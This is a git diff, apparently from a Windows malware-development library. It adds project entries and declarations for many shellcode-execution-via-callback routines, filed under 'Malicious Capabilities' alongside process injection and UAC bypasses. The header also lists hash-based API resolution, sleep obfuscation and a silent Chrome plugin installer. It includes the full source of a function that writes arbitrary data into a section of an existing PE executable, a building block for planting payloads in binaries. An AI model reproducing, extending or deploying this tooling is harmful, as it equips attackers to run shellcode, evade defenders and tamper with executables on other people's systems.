<ClCompile Include="MpfSceViaCertEnumSystemStoreLocation.cpp" />
|
||||
<ClCompile Include="MpfSceViaCertFindChainInStore.cpp" />
|
||||
<ClCompile Include="MpfSceViaCreateThreadpoolWait.cpp" />
|
||||
<ClCompile Include="MpfSceViaCreateTimerQueueTimer.cpp" />
|
||||
<ClCompile Include="MpfSceViaCryptEnumOIDInfo.cpp" />
|
||||
<ClCompile Include="MpfSceViaDSA_EnumCallback.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumChildWindows.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumDateFormatsW.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumDesktopsW.cpp" />
|
||||
|
@ -269,6 +276,7 @@
|
|||
<ClCompile Include="MpfSceViaEnumFontsW.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumLanguageGroupLocalesW.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumObjects.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumPropsExW.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumPwrSchemes.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumResourceTypesExW.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumSystemCodePagesW.cpp" />
|
||||
|
@ -280,6 +288,10 @@
|
|||
<ClCompile Include="MpfSceViaEnumUILanguagesW.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumWindows.cpp" />
|
||||
<ClCompile Include="MpfSceViaEnumWindowStationsW.cpp" />
|
||||
<ClCompile Include="MpfSceViaEvtSubscribe.cpp" />
|
||||
<ClCompile Include="MpfSceViaFlsAlloc.cpp" />
|
||||
<ClCompile Include="MpfSceViaImmEnumInputContext.cpp" />
|
||||
<ClCompile Include="MpfSceViaInitOnceExecuteOnce.cpp" />
|
||||
<ClCompile Include="MpfSceViaK32EnumPageFilesW.cpp" />
|
||||
<ClCompile Include="MpfSceViaMessageBoxIndirectW.cpp" />
|
||||
<ClCompile Include="ProxyRegisterWaitLoadLibrary.cpp" />
|
||||
|
@ -290,6 +302,7 @@
|
|||
<ClCompile Include="ShutdownHardwareBreakpointEngine.cpp" />
|
||||
<ClCompile Include="SleepObfuscationViaVirtualProtect.cpp" />
|
||||
<ClCompile Include="SnapshotInsertHardwareBreakpointHookIntoTargetThread.cpp" />
|
||||
<ClCompile Include="WriteDataToPeSection.cpp" />
|
||||
<ClCompile Include="__unstable__preview__MpfSilentInstallGoogleChromePlugin.cpp" />
|
||||
<ClCompile Include="SendIcmpEchoMessageToIPv4Host.cpp" />
|
||||
<ClCompile Include="OleGetClipboardData.cpp" />
|
||||
|
@ -303,7 +316,6 @@
|
|||
<ClCompile Include="SetLastErrorInTeb.cpp" />
|
||||
<ClCompile Include="SetLastNtStatusInTeb.cpp" />
|
||||
<ClCompile Include="SetProcessPrivilegeToken.cpp" />
|
||||
<ClCompile Include="ShellcodeExecutionViaFunctionCallbackMain.cpp" />
|
||||
<ClCompile Include="ShlwapiCharStringToWCharString.cpp" />
|
||||
<ClCompile Include="ShlwapiWCharStringToCharString.cpp" />
|
||||
<ClCompile Include="StringCompare.cpp" />
|
||||
|
|
|
@ -552,9 +552,6 @@
|
|||
<ClCompile Include="MpfPiControlInjection.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Process Injection</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="ShellcodeExecutionViaFunctionCallbackMain.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="UacBypassFodHelperMethod.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\UAC Bypasses</Filter>
|
||||
</ClCompile>
|
||||
|
@ -651,6 +648,45 @@
|
|||
<ClCompile Include="MpfSceViaMessageBoxIndirectW.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaImmEnumInputContext.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaCertFindChainInStore.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEnumPropsExW.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaCreateThreadpoolWait.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaCryptEnumOIDInfo.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaDSA_EnumCallback.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaCreateTimerQueueTimer.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaEvtSubscribe.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaInitOnceExecuteOnce.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaFlsAlloc.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="IsPeSection.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="AddSectionToPeFile.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="WriteDataToPeSection.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="Internal.h">
|
||||
|
|
|
@ -16,6 +16,9 @@
|
|||
#include <windns.h>
|
||||
#include <tlhelp32.h>
|
||||
#include <stdio.h>
|
||||
#include <imm.h>
|
||||
#include <dpa_dsa.h>
|
||||
#include <winevt.h>
|
||||
|
||||
|
||||
#pragma comment(lib, "Dnsapi.lib")
|
||||
|
@ -26,6 +29,9 @@
|
|||
#pragma comment(lib, "Urlmon.lib")
|
||||
#pragma comment(lib, "PowrProf.lib")
|
||||
#pragma comment(lib, "Ws2_32.lib")
|
||||
#pragma comment(lib, "Imm32.lib")
|
||||
#pragma comment(lib, "Comctl32.lib")
|
||||
#pragma comment(lib, "Wevtapi.lib")
|
||||
|
||||
|
||||
#ifndef NT_SUCCESS
|
||||
|
@ -80,40 +86,33 @@ DWORD RtlNtStatusToDosErrorViaImport(_In_ NTSTATUS Status);
|
|||
/*******************************************
|
||||
CRYPTOGRAPHY RELATED
|
||||
*******************************************/
|
||||
//#define TOKENIZE( x ) #x
|
||||
//#define CONCAT3( X, Y, Z ) X##Y##Z
|
||||
//#define HASHALGOA HashStringDjb2A
|
||||
//#define hasha( VAL ) constexpr auto CONCAT3(hash,VAL,A) = HASHALGOA((PCHAR)TOKENIZE(VAL))
|
||||
//#define hashw( VAL ) constexpr auto CONCAT3(hash,VAL,W) = HASHALGOA((PWCHAR)TOKENIZE(VAL))
|
||||
|
||||
|
||||
DWORD HashStringDjb2A(_In_ PCHAR String);
|
||||
DWORD HashStringDjb2W(_In_ PWCHAR String);
|
||||
ULONG HashStringFowlerNollVoVariant1aA(_In_ PCHAR String);
|
||||
ULONG HashStringFowlerNollVoVariant1aW(_In_ PWCHAR String);
|
||||
UINT32 HashStringJenkinsOneAtATime32BitA(_In_ PCHAR String);
|
||||
UINT32 HashStringJenkinsOneAtATime32BitW(_In_ PWCHAR String);
|
||||
DWORD HashStringLoseLoseA(_In_ PCHAR String);
|
||||
DWORD HashStringLoseLoseW(_In_ PWCHAR String);
|
||||
INT HashStringRotr32A(_In_ PCHAR String);
|
||||
INT HashStringRotr32W(_In_ PWCHAR String);
|
||||
DWORD HashStringSdbmA(_In_ PCHAR String);
|
||||
DWORD HashStringSdbmW(_In_ PWCHAR String);
|
||||
UINT32 HashStringSuperFastHashA(_In_ PCHAR String);
|
||||
UINT32 HashStringSuperFastHashW(_In_ PWCHAR String);
|
||||
INT HashStringUnknownGenericHash1A(_In_ PCHAR String);
|
||||
INT HashStringUnknownGenericHash1W(_In_ PWCHAR String);
|
||||
INT32 HashStringSipHashA(_In_ PCHAR String);
|
||||
INT32 HashStringSipHashW(_In_ PWCHAR String);
|
||||
INT32 HashStringMurmurA(_In_ PCHAR String);
|
||||
INT32 HashStringMurmurW(_In_ PWCHAR String);
|
||||
BOOL CreateMd5HashFromFilePathW(_In_ PWCHAR FilePath, _Inout_ PWCHAR Md5Hash);
|
||||
BOOL CreateMd5HashFromFilePathA(_In_ PCHAR FilePath, _Inout_ PCHAR Md5Hash);
|
||||
DWORD HashStringDjb2A(_In_ LPCSTR String);
|
||||
DWORD HashStringDjb2W(_In_ LPCWSTR String);
|
||||
ULONG HashStringFowlerNollVoVariant1aA(_In_ LPCSTR String);
|
||||
ULONG HashStringFowlerNollVoVariant1aW(_In_ LPCWSTR String);
|
||||
UINT32 HashStringJenkinsOneAtATime32BitA(_In_ LPCSTR String);
|
||||
UINT32 HashStringJenkinsOneAtATime32BitW(_In_ LPCWSTR String);
|
||||
DWORD HashStringLoseLoseA(_In_ LPCSTR String);
|
||||
DWORD HashStringLoseLoseW(_In_ LPCWSTR String);
|
||||
INT HashStringRotr32A(_In_ LPCSTR String);
|
||||
INT HashStringRotr32W(_In_ LPCWSTR String);
|
||||
DWORD HashStringSdbmA(_In_ LPCSTR String);
|
||||
DWORD HashStringSdbmW(_In_ LPCWSTR String);
|
||||
UINT32 HashStringSuperFastHashA(_In_ LPCSTR String);
|
||||
UINT32 HashStringSuperFastHashW(_In_ LPCWSTR String);
|
||||
INT HashStringUnknownGenericHash1A(_In_ LPCSTR String);
|
||||
INT HashStringUnknownGenericHash1W(_In_ LPCWSTR String);
|
||||
INT32 HashStringSipHashA(_In_ LPCSTR String);
|
||||
INT32 HashStringSipHashW(_In_ LPCWSTR String);
|
||||
INT32 HashStringMurmurA(_In_ LPCSTR String);
|
||||
INT32 HashStringMurmurW(_In_ LPCWSTR String);
|
||||
BOOL CreateMd5HashFromFilePathW(_In_ LPCWSTR FilePath, _Inout_ PWCHAR Md5Hash);
|
||||
BOOL CreateMd5HashFromFilePathA(_In_ LPCSTR FilePath, _Inout_ PCHAR Md5Hash);
|
||||
INT CreatePseudoRandomInteger(_In_ ULONG Seed);
|
||||
PWCHAR CreatePseudoRandomStringW(_In_ SIZE_T dwLength, _In_ ULONG Seed);
|
||||
PCHAR CreatePseudoRandomStringA(_In_ SIZE_T dwLength, _In_ ULONG Seed);
|
||||
BOOL HashFileByMsiFileHashTableW(_In_ PWCHAR Path, _Inout_ PULONG FileHash);
|
||||
BOOL HashFileByMsiFileHashTableA(_In_ PCHAR Path, _Inout_ PULONG FileHash);
|
||||
BOOL HashFileByMsiFileHashTableW(_In_ LPCWSTR Path, _Inout_ PULONG FileHash);
|
||||
BOOL HashFileByMsiFileHashTableA(_In_ LPCSTR Path, _Inout_ PULONG FileHash);
|
||||
ULONG CreatePseudoRandomIntegerFromNtdll(_In_ ULONG Seed);
|
||||
|
||||
|
||||
|
@ -126,18 +125,18 @@ PPEB GetPeb(VOID);
|
|||
PPEB GetPebFromTeb(VOID);
|
||||
PKUSER_SHARED_DATA GetKUserSharedData(VOID);
|
||||
PRTL_USER_PROCESS_PARAMETERS GetRtlUserProcessParameters(VOID);
|
||||
DWORD64 __stdcall GetProcAddressDjb2(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
|
||||
DWORD64 __stdcall GetProcAddressFowlerNollVoVariant1a(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
|
||||
DWORD64 __stdcall GetProcAddressJenkinsOneAtATime32Bit(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
|
||||
DWORD64 __stdcall GetProcAddressLoseLose(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
|
||||
DWORD64 __stdcall GetProcAddressRotr32(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
|
||||
DWORD64 __stdcall GetProcAddressSdbm(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
|
||||
DWORD64 __stdcall GetProcAddressSuperFastHash(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
|
||||
DWORD64 __stdcall GetProcAddressUnknownGenericHash1(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
|
||||
DWORD64 __stdcall GetProcAddressSipHash(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
|
||||
DWORD64 __stdcall GetProcAddressMurmur(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
|
||||
DWORD64 __stdcall GetProcAddressA(_In_ DWORD64 ModuleBase, _In_ LPCSTR lpProcName);
|
||||
DWORD64 __stdcall GetProcAddressW(_In_ DWORD64 ModuleBase, _In_ LPCWSTR lpProcName);
|
||||
DWORD64 GetProcAddressDjb2(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
|
||||
DWORD64 GetProcAddressFowlerNollVoVariant1a(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
|
||||
DWORD64 GetProcAddressJenkinsOneAtATime32Bit(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
|
||||
DWORD64 GetProcAddressLoseLose(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
|
||||
DWORD64 GetProcAddressRotr32(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
|
||||
DWORD64 GetProcAddressSdbm(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
|
||||
DWORD64 GetProcAddressSuperFastHash(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
|
||||
DWORD64 GetProcAddressUnknownGenericHash1(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
|
||||
DWORD64 GetProcAddressSipHash(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
|
||||
DWORD64 GetProcAddressMurmur(_In_ DWORD64 ModuleBase, _In_ DWORD64 Hash);
|
||||
DWORD64 GetProcAddressA(_In_ DWORD64 ModuleBase, _In_ LPCSTR lpProcName);
|
||||
DWORD64 GetProcAddressW(_In_ DWORD64 ModuleBase, _In_ LPCWSTR lpProcName);
|
||||
BOOL RtlLoadPeHeaders(_Inout_ PIMAGE_DOS_HEADER* Dos, _Inout_ PIMAGE_NT_HEADERS* Nt, _Inout_ PIMAGE_FILE_HEADER* File, _Inout_ PIMAGE_OPTIONAL_HEADER* Optional, _Inout_ PBYTE* ImageBase);
|
||||
HMODULE GetModuleHandleEx2A(_In_ LPCSTR lpModuleName);
|
||||
HMODULE GetModuleHandleEx2W(_In_ LPCWSTR lpModuleName);
|
||||
|
@ -151,10 +150,10 @@ HMODULE ProxyRegisterWaitLoadLibraryA(_In_ LPCSTR lpModuleName);
|
|||
/*******************************************
|
||||
HELPER FUNCTIONS
|
||||
*******************************************/
|
||||
BOOL IsPathValidA(_In_ PCHAR FilePath);
|
||||
BOOL IsPathValidW(_In_ PWCHAR FilePath);
|
||||
BOOL CreateLocalAppDataObjectPathW(_Inout_ PWCHAR pBuffer, _In_ PWCHAR Path, _In_ DWORD Size, _In_ BOOL bDoesObjectExist);
|
||||
BOOL CreateLocalAppDataObjectPathA(_Inout_ PCHAR pBuffer, _In_ PCHAR Path, _In_ DWORD Size, _In_ BOOL bDoesObjectExist);
|
||||
BOOL IsPathValidA(_In_ LPCSTR FilePath);
|
||||
BOOL IsPathValidW(_In_ LPCWSTR FilePath);
|
||||
BOOL CreateLocalAppDataObjectPathW(_Inout_ PWCHAR pBuffer, _In_ LPCWSTR Path, _In_ DWORD Size, _In_ BOOL bDoesObjectExist);
|
||||
BOOL CreateLocalAppDataObjectPathA(_Inout_ PCHAR pBuffer, _In_ LPCSTR Path, _In_ DWORD Size, _In_ BOOL bDoesObjectExist);
|
||||
BOOL GetSystemWindowsDirectoryA(_In_ DWORD nBufferLength, _Inout_ PCHAR lpBuffer);
|
||||
BOOL GetSystemWindowsDirectoryW(_In_ DWORD nBufferLength, _Inout_ PWCHAR lpBuffer);
|
||||
BOOL CreateWindowsObjectPathW(_Inout_ PWCHAR pBuffer, _In_ PWCHAR Path, _In_ DWORD Size, _In_ BOOL bDoesObjectExist);
|
||||
|
@ -194,6 +193,13 @@ BOOL FastcallExecuteBinaryShellExecuteExA(_In_ PCHAR FullPathToBinary, _In_ PCHA
|
|||
DWORD GetCurrentProcessIdFromOffset(VOID);
|
||||
HMODULE GetPeFileBaseAddress(VOID);
|
||||
DWORD64 LdrLoadGetProcedureAddress(VOID);
|
||||
BOOL IsPeSectionW(_In_ LPCWSTR PathToBinary, _In_ LPCWSTR PeSectionName);
|
||||
BOOL IsPeSectionA(_In_ LPCSTR PathToBinary, _In_ LPCSTR PeSectionName);
|
||||
BOOL AddSectionToPeFileW(_In_ LPCWSTR Path, _In_ LPCSTR SectionName, _In_ DWORD SectionSizeInBytes);
|
||||
BOOL AddSectionToPeFileA(_In_ LPCSTR Path, _In_ LPCSTR SectionName, _In_ DWORD SectionSizeInBytes);
|
||||
BOOL WriteDataToPeSectionW(_In_ LPCWSTR Path, _In_ LPCWSTR SectionName, _In_ PBYTE DataToWrite, _In_ DWORD DataToWriteInBytes);
|
||||
BOOL WriteDataToPeSectionA(_In_ LPCSTR Path, _In_ LPCSTR SectionName, _In_ PBYTE DataToWrite, _In_ DWORD DataToWriteInBytes);
|
||||
|
||||
|
||||
|
||||
|
||||
|
@ -204,8 +210,8 @@ LCID GetCurrentLocaleFromTeb(VOID);
|
|||
DWORD GetNumberOfLinkedDlls(VOID);
|
||||
BOOL IsNvidiaGraphicsCardPresentA(VOID);
|
||||
BOOL IsNvidiaGraphicsCardPresentW(VOID);
|
||||
BOOL IsProcessRunningA(_In_ PCHAR ProcessNameWithExtension);
|
||||
BOOL IsProcessRunningW(_In_ PWCHAR ProcessNameWithExtension);
|
||||
BOOL IsProcessRunningA(_In_ LPCSTR ProcessNameWithExtension);
|
||||
BOOL IsProcessRunningW(_In_ LPCWSTR ProcessNameWithExtension);
|
||||
BOOL IsProcessRunningAsAdmin(VOID);
|
||||
ULONG GetOsMajorVersionFromPeb(VOID);
|
||||
ULONG GetOsMinorVersionFromPeb(VOID);
|
||||
|
@ -280,6 +286,17 @@ BOOL MpfSceViaEnumerateLoadedModules64(_In_ PBYTE Payload, _In_ DWORD PayloadSiz
|
|||
BOOL MpfSceViaK32EnumPageFilesW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumPwrSchemes(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaMessageBoxIndirectW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes); //Unstable, only triggers on certain button presses, prone to crashing
|
||||
BOOL MpfSceViaImmEnumInputContext(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaCertFindChainInStore(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes); //Not working?
|
||||
BOOL MpfSceViaEnumPropsExW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaCreateThreadpoolWait(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes); //Unstable, some shellcode crashes application, requires improved testing
|
||||
BOOL MpfSceViaCryptEnumOIDInfo(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaDSA_EnumCallback(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaCreateTimerQueueTimer(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes); //Unstable, some shellcode crashes application, requires improved testing
|
||||
BOOL MpfSceViaEvtSubscribe(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes); //Unstable, some shellcode crashes application, requires improved testing
|
||||
BOOL MpfSceViaFlsAlloc(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaInitOnceExecuteOnce(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
|
||||
|
||||
|
||||
/*******************************************
|
||||
|
|
|
@ -0,0 +1,122 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL WriteDataToPeSectionW(_In_ LPCWSTR Path, _In_ LPCWSTR SectionName, _In_ PBYTE DataToWrite, _In_ DWORD DataToWriteInBytes)
|
||||
{
|
||||
BOOL bFlag = FALSE;
|
||||
HANDLE hHandle = INVALID_HANDLE_VALUE;
|
||||
LONGLONG SizeOfTargetBinary = 0L;
|
||||
|
||||
PBYTE FileBuffer = NULL;
|
||||
PIMAGE_DOS_HEADER Dos = NULL;
|
||||
PIMAGE_NT_HEADERS Nt = NULL;
|
||||
PIMAGE_FILE_HEADER File = NULL;
|
||||
PIMAGE_OPTIONAL_HEADER Optional = NULL;
|
||||
|
||||
PIMAGE_SECTION_HEADER Section = NULL;
|
||||
PIMAGE_SECTION_HEADER SectionHeaderArray = NULL;
|
||||
|
||||
CHAR DisposeableObject[32] = { 0 };
|
||||
|
||||
if (WCharStringToCharString(DisposeableObject, (PWCHAR)SectionName, StringLengthW(SectionName)) == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
SizeOfTargetBinary = GetFileSizeFromPathW((PWCHAR)Path, FILE_ATTRIBUTE_NORMAL);
|
||||
if (SizeOfTargetBinary == INVALID_FILE_SIZE)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
hHandle = CreateFileW(Path, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
|
||||
if (hHandle == INVALID_HANDLE_VALUE)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
FileBuffer = (PBYTE)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, SizeOfTargetBinary);
|
||||
if (FileBuffer == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!ReadFile(hHandle, FileBuffer, (DWORD)SizeOfTargetBinary, NULL, NULL))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, &FileBuffer);
|
||||
|
||||
SectionHeaderArray = (PIMAGE_SECTION_HEADER)(ULONGLONG(Nt) + sizeof(IMAGE_NT_HEADERS));
|
||||
for (DWORD dwX = 0; dwX < File->NumberOfSections; dwX++)
|
||||
{
|
||||
if (StringCompareA((PCHAR)SectionHeaderArray[dwX].Name, DisposeableObject) == ERROR_SUCCESS)
|
||||
{
|
||||
if (SetFilePointer(hHandle, SectionHeaderArray[dwX].PointerToRawData, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!WriteFile(hHandle, DataToWrite, DataToWriteInBytes, NULL, NULL))
|
||||
goto EXIT_ROUTINE;
|
||||
}
|
||||
}
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (FileBuffer)
|
||||
HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, FileBuffer);
|
||||
|
||||
if (hHandle)
|
||||
CloseHandle(hHandle);
|
||||
|
||||
return bFlag;
|
||||
}
|
||||
|
||||
BOOL WriteDataToPeSectionA(_In_ LPCSTR Path, _In_ LPCSTR SectionName, _In_ PBYTE DataToWrite, _In_ DWORD DataToWriteInBytes)
|
||||
{
|
||||
BOOL bFlag = FALSE;
|
||||
HANDLE hHandle = INVALID_HANDLE_VALUE;
|
||||
LONGLONG SizeOfTargetBinary = 0L;
|
||||
|
||||
PBYTE FileBuffer = NULL;
|
||||
PIMAGE_DOS_HEADER Dos = NULL;
|
||||
PIMAGE_NT_HEADERS Nt = NULL;
|
||||
PIMAGE_FILE_HEADER File = NULL;
|
||||
PIMAGE_OPTIONAL_HEADER Optional = NULL;
|
||||
|
||||
PIMAGE_SECTION_HEADER Section = NULL;
|
||||
PIMAGE_SECTION_HEADER SectionHeaderArray = NULL;
|
||||
|
||||
SizeOfTargetBinary = GetFileSizeFromPathA((PCHAR)Path, FILE_ATTRIBUTE_NORMAL);
|
||||
if (SizeOfTargetBinary == INVALID_FILE_SIZE)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
hHandle = CreateFileA(Path, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
|
||||
if (hHandle == INVALID_HANDLE_VALUE)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
FileBuffer = (PBYTE)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, SizeOfTargetBinary);
|
||||
if (FileBuffer == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!ReadFile(hHandle, FileBuffer, (DWORD)SizeOfTargetBinary, NULL, NULL))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, &FileBuffer);
|
||||
|
||||
SectionHeaderArray = (PIMAGE_SECTION_HEADER)(ULONGLONG(Nt) + sizeof(IMAGE_NT_HEADERS));
|
||||
for (DWORD dwX = 0; dwX < File->NumberOfSections; dwX++)
|
||||
{
|
||||
if (StringCompareA((PCHAR)SectionHeaderArray[dwX].Name, SectionName) == ERROR_SUCCESS)
|
||||
{
|
||||
if (SetFilePointer(hHandle, SectionHeaderArray[dwX].PointerToRawData, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!WriteFile(hHandle, DataToWrite, DataToWriteInBytes, NULL, NULL))
|
||||
goto EXIT_ROUTINE;
|
||||
}
|
||||
}
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (FileBuffer)
|
||||
HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, FileBuffer);
|
||||
|
||||
if (hHandle)
|
||||
CloseHandle(hHandle);
|
||||
|
||||
return bFlag;
|
||||
}
|
Loading…
Reference in New Issue